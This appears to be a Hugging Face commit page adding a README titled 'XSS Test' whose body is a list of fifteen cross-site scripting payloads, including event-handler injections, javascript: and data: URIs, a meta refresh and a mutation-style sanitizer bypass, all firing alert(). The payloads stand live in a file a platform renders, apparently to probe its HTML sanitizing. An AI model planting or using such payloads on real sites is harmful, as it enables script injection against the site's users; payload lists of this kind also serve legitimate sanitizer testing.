FIRSTACCOUNT69 commited on
Commit
8f6bb0e
·
verified ·
1 Parent(s): afe6eb2

Add README with security tests

Browse files
Files changed (1) hide show
  1. README.md +35 -0
README.md ADDED
@@ -0,0 +1,35 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ title: XSS Test
3
+ ---
4
+
5
+ # Security Testing
6
+
7
+ Test 1: <img src=x onerror=alert(document.domain)>
8
+
9
+ Test 2: <svg/onload=alert(1)>
10
+
11
+ Test 3: <details open ontoggle=alert(1)><summary>Click</summary>content</details>
12
+
13
+ Test 4: <math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
14
+
15
+ Test 5: <a href="data:text/html,<script>alert(1)</script>">click</a>
16
+
17
+ Test 6: <marquee onstart=alert(1)>
18
+
19
+ Test 7: <input onfocus=alert(1) autofocus>
20
+
21
+ Test 8: <video><source onerror=alert(1)>
22
+
23
+ Test 9: <body onload=alert(1)>
24
+
25
+ Test 10: <div style="width:expression(alert(1))">
26
+
27
+ Test 11: <object data="javascript:alert(1)">
28
+
29
+ Test 12: <embed src="javascript:alert(1)">
30
+
31
+ Test 13: <base href="javascript:alert(1)//">
32
+
33
+ Test 14: <link rel=import href="data:text/html,<script>alert(1)</script>">
34
+
35
+ Test 15: <meta http-equiv=refresh content="0;url=javascript:alert(1)">